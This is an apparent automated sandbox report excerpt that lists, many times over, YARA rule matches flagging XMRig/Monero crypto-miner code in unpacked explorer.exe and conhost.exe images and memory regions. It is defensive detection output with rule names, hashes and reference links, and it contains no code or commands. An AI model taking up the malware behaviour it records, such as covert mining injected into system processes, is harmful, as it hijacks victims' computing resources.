              Source: 17.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 9.2.conhost.exe.2c960f01280.7.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 9.2.conhost.exe.2c960f01280.7.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
